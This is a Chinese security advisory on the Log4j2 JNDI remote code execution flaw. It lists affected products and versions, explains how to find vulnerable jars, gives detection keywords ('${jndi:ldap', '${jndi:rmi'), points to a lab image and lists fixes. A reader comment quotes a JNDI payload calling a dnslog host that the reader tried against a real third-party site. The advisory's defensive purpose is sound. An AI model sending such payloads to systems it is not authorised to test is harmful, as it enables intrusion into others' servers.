【安全通报】Apache Log4j2 远程代码执行漏洞

fmbd  840天前

2021120922.png

漏洞描述

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。

在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及时排查相关漏洞,经过白帽汇安全研究院分析确认,目前市面有多款流行的系统都受影响。

该漏洞危害等级:严重

影响范围

Apache Log4j 2.x < 2.15.0-rc2

已知影响组件

  • Apache Struts2
  • Apache Solr
  • Apache Flink
  • Apache Druid
  • flume
  • dubbo
  • logstash
  • VMware Horizon
  • VMware vCenter Server
  • VMware HCX
  • VMware NSX-T Data Center
  • VMware Unified Access Gateway
  • VMware WorkspaceOne Access
  • VMware Identity Manager`
  • VMware vRealize Operations
  • VMware vRealize Operations Cloud Proxy
  • VMware vRealize Log Insight
  • VMware vRealize Automation
  • VMware vRealize Lifecycle Manager
  • VMware Telco Cloud Automation
  • VMware Site Recovery Manager
  • VMware Carbon Black Cloud Workload Appliance
  • VMware Carbon Black EDR Server
  • VMware Tanzu GemFire
  • VMware Tanzu Greenplum
  • VMware Tanzu Operations Manager
  • VMware Tanzu Application Service for VMs
  • VMware Tanzu Kubernetes Grid Integrated Edition
  • VMware Tanzu Observability by Wavefront Nozzle
  • Healthwatch for Tanzu Application Service
  • Spring Cloud Services for VMware Tanzu
  • Spring Cloud Gateway for VMware Tanzu
  • Spring Cloud Gateway for Kubernetes
  • API Portal for VMware Tanzu
  • Single Sign-On for VMware Tanzu Application Service
  • App Metrics
  • VMware vCenter Cloud Gateway
  • VMware Tanzu SQL with MySQL for VMs
  • VMware vRealize Orchestrator
  • VMware Cloud Foundation
  • VMware Workspace ONE Access Connector
  • VMware Horizon DaaS
  • VMware Horizon Cloud Connector

受影响开源组件

项目 仓库地址 版本
elasticsearch(org.elasticsearch) https://github.com/elastic/elasticsearch 8.0.0-alpha2 等(共 100 个)
spring-webflux(org.springframework) https://github.com/spring-projects/spring-framework 5.2.6.RELEASE 等(共 40 个)
druid(com.alibaba) https://github.com/alibaba/druid 1.2.8 等(共 68 个)
hystrix-rx-netty-metrics-stream(com.netflix.hystrix) https://github.com/Netflix/Hystrix 1.5.4 等(共 2 个)
spring-cloud-starter-alibaba-sentinel(com.alibaba.cloud) https://github.com/alibaba/spring-cloud-alibaba 2021.1 等(共 14 个)
spring-boot-starter-ahas-sentinel-client(com.alibaba.csp) https://github.com/alibaba/Sentinel 1.3.2 等(共 17 个)
redisson(org.redisson) https://github.com/redisson/redisson 2.2.24 等(共 3 个)
HikariCP(com.zaxxer) https://github.com/brettwooldridge/HikariCP 5.0.0 等(共 27 个)
zipkin-collector-service(io.zipkin) https://github.com/openzipkin/zipkin 1.40.2 等(共 27 个)
mybatis-plus(com.baomidou) https://github.com/baomidou/mybatis-plus 3.4.3.4 等(共 41 个)
zuul-sample(com.netflix.zuul) https://github.com/Netflix/zuul 2.3.0 等(共 10 个)
watson-data-api-client(com.ibm.watson.data) https://github.com/OpenAPITools/openapi-generator 0.1 等(共 1 个)
spring-boot-admin-sample-consul(de.codecentric) https://github.com/codecentric/spring-boot-admin 2.5.4 等(共 40 个)
jedis(redis.clients) https://github.com/redis/jedis jedis-3.6.2 等(共 36 个)
grpc-benchmarks(io.grpc) https://github.com/grpc/grpc-java 1.9.1 等(共 65 个)
ktor-client-json-tests(io.ktor) https://github.com/ktorio/ktor 1.6.7 等(共 32 个)
gitbucket_2.13(io.github.gitbucket) https://github.com/gitbucket/gitbucket 4.32.0 等(共 27 个)
finagle-zipkin_2.12(com.twitter) https://github.com/twitter/finagle 7.1.0 等(共 56 个)
resilience4j-vertx(io.github.resilience4j) https://github.com/resilience4j/resilience4j 0.9.0 等(共 9 个)
elasticsearch-sql(org.nlpcn) https://github.com/NLPchina/elasticsearch-sql 6.8.13.0 等(共 9 个)
exposed-spring-boot-starter(org.jetbrains.exposed) https://github.com/JetBrains/Exposed 0.36.2 等(共 11 个)
blade-sql2o(com.bladejava) https://github.com/lets-blade/blade 1.2.9 等(共 1 个)
netty-socketio(com.corundumstudio.socketio) https://github.com/mrniko/netty-socketio 1.7.19 等(共 8 个)
springfox-swagger2(io.springfox) https://github.com/springfox/springfox 2.10.5 等(共 6 个)
main_2.12(org.scala-sbt) https://github.com/sbt/sbt 1.6.0-RC1 等(共 88 个)
lettuce-core(io.lettuce) https://github.com/lettuce-io/lettuce-core 6.1.5.RELEASE 等(共 42 个)
repository-azure(org.opensearch.plugin) https://github.com/opensearch-project/OpenSearch 1.2.0 等(共 3 个)
reactor-test(io.projectreactor) https://github.com/reactor/reactor-core 3.3.4.RELEASE 等(共 3 个)
corda-webserver-impl(net.corda) https://github.com/corda/corda corda-3.0 等(共 32 个)
conductor-redis-persistence(com.netflix.conductor) https://github.com/Netflix/conductor 3.3.6 等(共 100 个)
armeria(com.linecorp.armeria) https://github.com/line/armeria 0.26.1.Final 等(共 2 个)
breeze-parent_2.13(org.scalanlp) https://github.com/scalanlp/breeze 2.0.1-RC1 等(共 5 个)
micrometer-core(io.micrometer) https://github.com/micrometer-metrics/micrometer 1.8.1 等(共 98 个)
alink_connector_jdbc_sqlite_flink-1.9_2.11(com.alibaba.alink) https://github.com/alibaba/Alink 1.5.1 等(共 3 个)
initializr-actuator(io.spring.initializr) https://github.com/spring-io/initializr 0.9.0 等(共 6 个)
telegrambots-spring-boot-starter(org.telegram) https://github.com/rubenlagus/TelegramBots 4.9.1 等(共 17 个)
spring-data-elasticsearch(org.springframework.data) https://github.com/spring-projects/spring-data-elasticsearch 4.3.0 等(共 86 个)
feast-common(dev.feast) https://github.com/feast-dev/feast 0.9.2 等(共 26 个)
javamelody-core(net.bull.javamelody) https://github.com/javamelody/javamelody 1.88.0 等(共 13 个)
analytics-zoo-bigdl_0.13.0-spark_3.0.0(com.intel.analytics.zoo) https://github.com/intel-analytics/analytics-zoo 0.11.0-RC1 等(共 4 个)
scio-tensorflow_2.13(com.spotify) https://github.com/spotify/scio 0.9.6 等(共 97 个)
grpc-client-spring-boot-autoconfigure(net.devh) https://github.com/yidongnan/grpc-spring-boot-starter 2.9.0.RELEASE 等(共 16 个)
inject-server_2.12(com.twitter) https://github.com/twitter/finatra 21.9.0 等(共 56 个)
client-java-examples(io.kubernetes) https://github.com/kubernetes-client/java 8.0.2 等(共 1 个)
reactivesocket-tck-drivers(io.reactivesocket) https://github.com/rsocket/rsocket-java 0.6.0 等(共 1 个)
jest-droid(io.searchbox) https://github.com/searchbox-io/Jest 6.3.1 等(共 8 个)
graphql-dgs-example-java-webflux(com.netflix.graphql.dgs) https://github.com/Netflix/dgs-framework 4.9.7 等(共 36 个)
quill-jdbc-monix_2.11(io.getquill) https://github.com/getquill/quill 3.9.0 等(共 62 个)
doobie-quill_2.12(org.tpolecat) https://github.com/tpolecat/doobie 1.0.0-RC1 等(共 61 个)
http4k(org.http4k) https://github.com/http4k/http4k 4.3.4.1 等(共 3 个)
elasticsearch-hadoop(org.elasticsearch) https://github.com/elastic/elasticsearch-hadoop 8.0.0-beta1 等(共 100 个)
sbt-shading(io.get-coursier) https://github.com/coursier/coursier 1.0.0-RC8 等(共 1 个)
spark-cassandra-connector-unshaded_2.10(com.datastax.spark) https://github.com/datastax/spark-cassandra-connector 2.0.9 等(共 54 个)
webdrivermanager(io.github.bonigarcia) https://github.com/bonigarcia/webdrivermanager 4.0.0 等(共 15 个)
common-auth-v3(com.tencent.bk.devops.ci.common) https://github.com/Tencent/bk-ci 1.2.0-rc.7-RELEASE 等(共 3 个)
reactor-netty(io.projectreactor.netty) https://github.com/reactor/reactor-netty 1.0.9 等(共 75 个)
evcache-client-sample(com.netflix.evcache) https://github.com/Netflix/EVCache 5.18.9 等(共 63 个)
xtdb-test(com.xtdb) https://github.com/xtdb/xtdb 1.20.0 等(共 9 个)
transport-netty4(com.strapdata.elasticsearch.plugin) https://github.com/strapdata/elassandra 6.2.3.31 等(共 14 个)
sbt-metals(org.scalameta) https://github.com/scalameta/metals 0.9.9 等(共 17 个)
elastic4s-embedded_2.12(com.sksamuel.elastic4s) https://github.com/sksamuel/elastic4s 6.7.8 等(共 100 个)
genie-agent(com.netflix.genie) https://github.com/Netflix/genie 4.0.4 等(共 100 个)
spring-kafka(org.springframework.kafka) https://github.com/spring-projects/spring-kafka 2.7.9 等(共 79 个)
db-async-common_2.13(com.dripower) https://github.com/mauricio/postgresql-async 0.3.109 等(共 19 个)
selenide(com.codeborne) https://github.com/selenide/selenide 5.25.0-selenium-4.0.0-rc-2 等(共 18 个)
cloudfoundry-identity-server(org.cloudfoundry.identity) https://github.com/cloudfoundry/uaa 4.30.0 等(共 1 个)
servo-atlas(com.netflix.servo) https://github.com/Netflix/servo 0.13.2 等(共 20 个)
rxnetty-spectator-tcp(io.reactivex) https://github.com/ReactiveX/RxNetty 0.5.3-rc.4 等(共 12 个)
mleap-tensorflow_2.10(ml.combust.mleap) https://github.com/combust/mleap 0.9.6 等(共 25 个)
spark-testing-base_2.12(com.holdenkarau) https://github.com/holdenk/spark-testing-base 2.4.4_1.1.1 等(共 100 个)
graphql-kotlin-spring-client(com.expediagroup) https://github.com/ExpediaGroup/graphql-kotlin 5.0.0-alpha.0 等(共 20 个)
graphql-spring-boot-test-autoconfigure(com.graphql-java-kickstart) https://github.com/graphql-java-kickstart/graphql-spring-boot 8.1.1 等(共 33 个)
discord4j-rest(com.discord4j) https://github.com/Discord4J/Discord4J 3.2.1 等(共 15 个)
twitter-server-logback-classic_2.13(com.twitter) https://github.com/twitter/twitter-server 21.9.0 等(共 54 个)
synthea(org.mitre.synthea) https://github.com/synthetichealth/synthea 2.7.0 等(共 2 个)
spring-integration-redis(org.springframework.integration) https://github.com/spring-projects/spring-integration 5.5.6 等(共 30 个)
cyclops-reactor-integration(com.oath.cyclops) https://github.com/aol/cyclops 10.4.0 等(共 1 个)
akka-stream-alpakka-geode_2.12(com.lightbend.akka) https://github.com/akka/alpakka 1.0-M1 等(共 13 个)
mantis-client(io.mantisrx) https://github.com/Netflix/mantis 1.3.9 等(共 83 个)
mybatis-generator-plugin(com.itfsw) https://github.com/itfsw/mybatis-generator-plugin 1.2.9 等(共 31 个)
ktorm-support-sqlserver(org.ktorm) https://github.com/kotlin-orm/ktorm 3.3.0 等(共 11 个)
gatk(org.broadinstitute) https://github.com/broadinstitute/gatk 4.beta.2 等(共 39 个)
azure-messaging-servicebus(com.azure) https://github.com/Azure/azure-sdk-for-java 7.5.1 等(共 100 个)
mica-metrics(net.dreamlu) https://github.com/lets-mica/mica 2.5.7 等(共 7 个)
shiro-redis(org.crazycake) https://github.com/alexxiyang/shiro-redis 3.3.1 等(共 2 个)
enumeratum-play_2.12(com.beachape) https://github.com/lloydmeta/enumeratum 1.5.16 等(共 2 个)
jdonframework(org.jdon) https://github.com/banq/jdonframework 6.6.8 等(共 1 个)
weid-java-sdk(com.webank) https://github.com/WeBankBlockchain/WeIdentity 1.8.1 等(共 3 个)
log-protocol(io.shulie.pradar) https://github.com/shulieTech/Takin 2.0.3 等(共 3 个)
micro-boot(com.oath.microservices) https://github.com/aol/micro-server 1.2.6 等(共 38 个)
sparkling-water-package_2.11(ai.h2o) https://github.com/h2oai/sparkling-water 2.4.10 等(共 36 个)
scalatest_2.13(au.com.dius.pact.provider) https://github.com/pact-foundation/pact-jvm 4.2.4 等(共 5 个)
mssql-jdbc(com.microsoft.sqlserver) https://github.com/microsoft/mssql-jdbc 8.3.0.jre11-preview 等(共 100 个)
elide-spring-boot-starter(com.yahoo.elide) https://github.com/yahoo/elide 6.0.3 等(共 45 个)
kafka-connect-elastic5(com.datamountaineer) https://github.com/lensesio/stream-reactor 1.2.0 等(共 5 个)
kvision-server-spring-boot-jvm(io.kvision) https://github.com/rjaros/kvision 5.4.3 等(共 9 个)
r2dbc-postgresql(org.postgresql) https://github.com/pgjdbc/r2dbc-postgresql 0.9.0.RC1 等(共 8 个)
play-slick-evolutions_2.13(com.typesafe.play) https://github.com/playframework/play-slick 5.0.0-RC3 等(共 29 个)
sbt-bloop-core(ch.epfl.scala) https://github.com/scalacenter/bloop 1.4.8-43-c2d941d9 等(共 29 个)
jcseg-elasticsearch(org.lionsoul) https://github.com/lionsoul2014/jcseg 2.6.2 等(共 7 个)

更多受影响组件查询,请点击以下链接查询:https://log4j2.huoxian.cn/

漏洞排查

代码排查:查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2

1.png

Linux:

sudo find / -name "*log4j-*.jar"

2.png

Windows:

*log4j*.jar

3.png

攻击排查

日志排查:

攻击者在利用前通常采用dnslog方式进行扫描、探测,对于常见利用方式可通过应用系统报错日志中的

"javax.naming.CommunicationException"

"javax.naming.NamingException: problem generating object using object factory"

"Error looking up JNDI resource"关键字进行排查。

流量排查:

攻击者的数据包中可能存在:“${jndi:rmi”、“${jndi:ldap”字样,可根据此类关键字进行排查。

漏洞复现

Image

Vulfocus 靶场环境

目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:

http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c

也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行,本地启动命令:docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest

vulfocus.png

修复建议

1、禁止使用 log4j 服务器外连,升级 idk 11.0.1 8u191 7u201 6u211 或更高版本。

2、升级至 log4j-2.15.0-rc2:

     下载地址:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

3、紧急缓解措施:

(1) 修改 jvm 参数 -Dlog4j2.formatMsgNoLookups=true

(2) 修改配置 log4j2.formatMsgNoLookups=True

(3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true

参考

[1] https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

[2] [LOG4J2-3201] Limit the protocols jNDI can use and restrict LDAP. - ASF JIRA (apache.org)

[3] ASF Git Repos - logging-log4j2.git/blob - log4j-core/src/test/java/org/apache/logging/log4j/core/lookup/JndiRestrictedLookupTest.java

[4] https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw

[5] https://help.aliyun.com/noticelist/articleid/1060971232.html

[6] https://mp.weixin.qq.com/s/C4zeXHKHDqPeRuLytO7Fzw

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

最新评论

alive  :  **://vulfocus.fo**.so/#/login?redirect=%2Fdashboard这个地址注册了,登陆不进去
839天前 回复
123  :  使用用户名登录
839天前 回复
alive  :  回复 @ 123 &nbsp;:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 感谢
839天前 回复
alive  :  回复 这个请求成ok就没了么?
839天前 回复
alive  :  没明白复现的逻辑。。。
839天前 回复
123  :  再研究研究哈哈
839天前 回复
小白  :  你复现出来了吗
839天前 回复
小白  :  你复现出来了吗
839天前 回复
bin  :  已经修复了吗?
839天前 回复
123  :  最新版已经被绕过
839天前 回复
123  :  最新版已经被绕过
839天前 回复
bin  :  回复 @ 123 &nbsp;:&nbsp; &nbsp;之前说百度有这个bug。我试了一下·${jndi:ldap://**x.dnslog.cn/exp}·。返回是很抱歉,您要访问的页面不存在!这是不是说明已经修复了
839天前 回复
WeeHours  :  docker的端口开多少啊
839天前 回复
123  :  -P命令可以看到,会随机起一个端口
839天前 回复
alive  :  必须要使用jndi 注入吗?
839天前 回复
123  :  是的
839天前 回复
alive  :  我模拟的文章中的idea 的代**。。
839天前 回复
hong  :  复现的代** 怎么打**了,不能公开吗
839天前 回复
hong  :  复现的代马 怎么打马了,不能公开吗
839天前 回复
xying  :  这个**是只能dnslog嘛?
839天前 回复
0xFFEF  :  sql漏洞也是用calc 做复现。哈哈哈
839天前 回复
xyx  :  这个怎么复现?
839天前 回复
anayng  :  搭建个ldap就复现了
839天前 回复
灰太狼大王  :  有大佬能方便告知下这个漏洞改怎么复现**吗,稍微详细下,新**学习
839天前 回复
小二  :  同楼上
839天前 回复
小白  :  回复 同楼上
839天前 回复
123  :  回复 @ 小白 &nbsp;:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;vulfocus靶场的描述中有复现**哦&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
839天前 回复
王多鱼  :  docker**打开无法运行啊
839天前 回复
Mike  :  &nbsp;Finally, Apache Team has come up with the advisory along with a couple of bug fixes.&nbsp;Apache Log4j Vulnerability Details and Mitigation&nbsp;**s://**.cyberkendra.com/2021/12/apache -log4j-vulnerability-details-and.html
839天前 回复
jsdryan  :  FOFA Dorking?
835天前 回复
昵称
邮箱
提交评论